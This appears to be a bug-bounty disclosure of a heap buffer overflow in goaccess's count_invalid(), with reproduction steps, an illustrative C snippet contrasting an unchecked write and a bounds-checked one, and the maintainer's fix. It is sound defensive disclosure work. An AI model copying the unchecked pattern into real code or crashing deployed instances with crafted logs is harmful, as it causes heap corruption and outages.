Heap-based Buffer Overflow in allinurl/goaccess

Status: Valid

Reported on Nov 23rd 2021

Description

Good evening, I hope you're doing well during these challenging times. During recent research, we discovered a heap-buffer-overflow vulnerability impacting count_invalid() on line 555 of src/gstorage.c. It appears that this is caused by an excessive number of invalid log strings combined with no bounds checking in this area of code.
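To illustrate the bug class the report describes, here is an added example that is not goaccess's own code: a hypothetical count_invalid that indexes a fixed-capacity heap buffer by the running invalid-line count with no bounds check, beside a version that checks the index before writing. The GLog fields, INVALID_CAP and the one-byte-per-invalid-line layout are assumptions made for the illustration.

```c
#include <stdlib.h>
#include <string.h>

/* Constructed illustration of the pattern, not goaccess's real structures.
 * Assumption: a fixed-capacity heap buffer records one entry per invalid
 * log line, and the writer trusts the running count as the index. */
#define INVALID_CAP 8

typedef struct {
    size_t invalid;         /* number of invalid lines seen so far */
    size_t cap;             /* capacity of the entries buffer */
    unsigned char *entries; /* heap buffer, one byte per invalid line */
} GLog;

GLog *glog_new(size_t cap) {
    GLog *g = calloc(1, sizeof *g);
    if (!g) return NULL;
    g->entries = calloc(cap, 1);
    if (!g->entries) { free(g); return NULL; }
    g->cap = cap;
    return g;
}

void glog_free(GLog *g) { if (g) { free(g->entries); free(g); } }

/* Unsafe variant: writes at index glog->invalid with no bounds check.
 * Once more than cap invalid lines arrive, this writes past the end of
 * the heap allocation, which is what ASan reports as heap-buffer-overflow. */
void count_invalid_unchecked(GLog *g, const char *line) {
    g->entries[g->invalid++] = (unsigned char) line[0];
}

/* Hardened variant: still counts every invalid line so totals stay right,
 * but never writes past the allocated capacity. Returns 1 if the entry
 * was stored, 0 if it was only counted. */
int count_invalid_checked(GLog *g, const char *line) {
    size_t idx = g->invalid++;
    if (idx >= g->cap) return 0;
    g->entries[idx] = (unsigned char) line[0];
    return 1;
}

/* Feeds n constructed malformed lines to the checked counter and returns
 * how many were stored; the excess lines are counted but not stored. */
size_t feed_invalid_lines(GLog *g, size_t n) {
    size_t stored = 0;
    for (size_t i = 0; i < n; i++)
        stored += (size_t) count_invalid_checked(g, "not a log line");
    return stored;
}
```

Compiling the unchecked variant with -fsanitize=address and feeding it more than INVALID_CAP invalid lines reproduces the same class of report the screenshot shows.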

Proof of Concept

First compile goaccess with clang + AddressSanitizer. I used clang-12 on Ubuntu 18.04.whatever.

Then decode the base64-encoded gzip payload from the report into /tmp/test0000.gz and gunzip it.

Command line:

    cat /tmp/test0000 | ./goaccess -p /dev/null -f -

Then select a combined log format or a common log format. It does NOT crash with the Squid Native Format or W3C.

The stack trace is hard to read due to some sort of formatting issue, but we can see SUMMARY: AddressSanitizer: heap-buffer-overflow /root/goaccess/src/gstorage.c:555:38 in count_invalid. Screenshot: https://i.imgur.com/DAvvHAA.png

Impact

This vulnerability can crash the software, corrupt the heap, and cause other unintended consequences of reading past the buffer.

We are processing your report and will contact the allinurl/goaccess team within 24 hours. (11 days ago)
We have contacted a member of the allinurl/goaccess team and are waiting to hear back. (10 days ago)
Gerardo O. validated this vulnerability. (10 days ago)
Geeknik Labs has been awarded the disclosure bounty.
The fix bounty is now up for grabs.

Gerardo O. (Maintainer), 9 days ago:

Thanks so much for reporting this issue. I've pushed upstream a fix that addresses this problem. I'll work on a new build and make sure to release v1.5.3 asap.

Gerardo O. confirmed that a fix has been merged in 977424. (8 days ago)
Gerardo O. has been awarded the fix bounty.